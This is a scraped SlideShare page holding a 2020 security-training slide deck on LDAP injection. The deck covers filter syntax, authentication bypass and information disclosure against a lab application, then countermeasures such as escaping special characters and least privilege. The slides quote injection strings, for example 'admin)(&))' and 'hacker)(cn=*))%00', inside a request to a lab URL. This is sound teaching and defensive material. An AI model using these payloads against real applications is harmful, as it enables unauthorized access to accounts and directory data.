O slideshow foi denunciado.
Utilizamos seu perfil e dados de atividades no LinkedIn para personalizar e exibir anúncios mais relevantes. Altere suas preferências de anúncios quando desejar.

LDAP Injection

Understand the web server architecture with LDAP server and what impact LDAP injection can cause.

Livros relacionados

Gratuito durante 30 dias do Scribd

Ver tudo

Audiolivros relacionados

Gratuito durante 30 dias do Scribd

Ver tudo
  • Seja o primeiro a comentar

LDAP Injection

  1. 1. LDAP Injection Swapnil Jain Date: 28 April 2020
  2. 2. #Who Am I ● Security Analyst ● Twitter @swapnil_jn
  3. 3. Overview ● LDAP Injection ● Authentication Bypass ● Demo ● Impact ● Securing Applications against LDAP Injection
  4. 4. LDAP Injection The Lightweight Directory Access Protocol(LDAP) is used to store information about users hosts, and many other objects. LDAP injection is a type of attack on a web application where attackers place code in a user input field in an attempt to gain unauthorized access or information.
  5. 5. Basic LDAP Syntax Common Operators: ● “=” (equal to) ● & (logical and) ● | (logical or) ● ! (logical not) ● * (wildcard) Filter: ● (cn=sam) ● (cn=s*) ● (|(cn=s*)(cn=t*)) ● (&(cn=s*)(sn=*d))
  6. 6. Normal Working (&(cn=admin)(passwd=secret)) LDAP Server Admin authenticated
  7. 7. Authentication Bypass Username: admin)(&)), Password: ignored Web Server LDAP Server Directory Search AdminSet Cookie: PHPSESSIONID=admin
  8. 8. Test Case ● <input type="text" size=20 name="name">Enter the Username to search for</input> ● Searchfilter="(cn="+name+")" admin)(|(password=*) (cn=admin)(|(password=*) )
  9. 9. Authentication Bypass (Normal Request)
  10. 10. Payload Creation Original Request : http://10.90.100.50/ldap_lab/ldap/example2.php?name=hacker&password =hacker Payload : name=hacker)(cn=*))%00 Changed request: http://10.90.100.50/ldap_lab/ldap/example2.php?name=hacker)(cn=*))%0 0&password=hacker
  11. 11. Authentication Bypass(Contd.)
  12. 12. Information Disclosure
  13. 13. Information Disclosure(Contd.)
  14. 14. Impact ● Authentication bypass ● Privilege escalation ● Information disclosure
  15. 15. Countermeasures ● LDAP special characters are safely escaped, including at least ( ) ! | & * ● Use Frameworks that Automatically Protect from LDAP Injection ○ LINQ to Active Directory provides LDAP encoding when building LDAP queries. ● Least privilege
  16. 16. Thank You

    Seja o primeiro a comentar

  • MangeshGupta5

    May. 1, 2020
  • MaulikLakhani

    May. 13, 2020

Understand the web server architecture with LDAP server and what impact LDAP injection can cause.

Vistos

Vistos totais

527

No Slideshare

0

De incorporações

0

Número de incorporações

33

Ações

Baixados

5

Compartilhados

0

Comentários

0

Curtir

2

×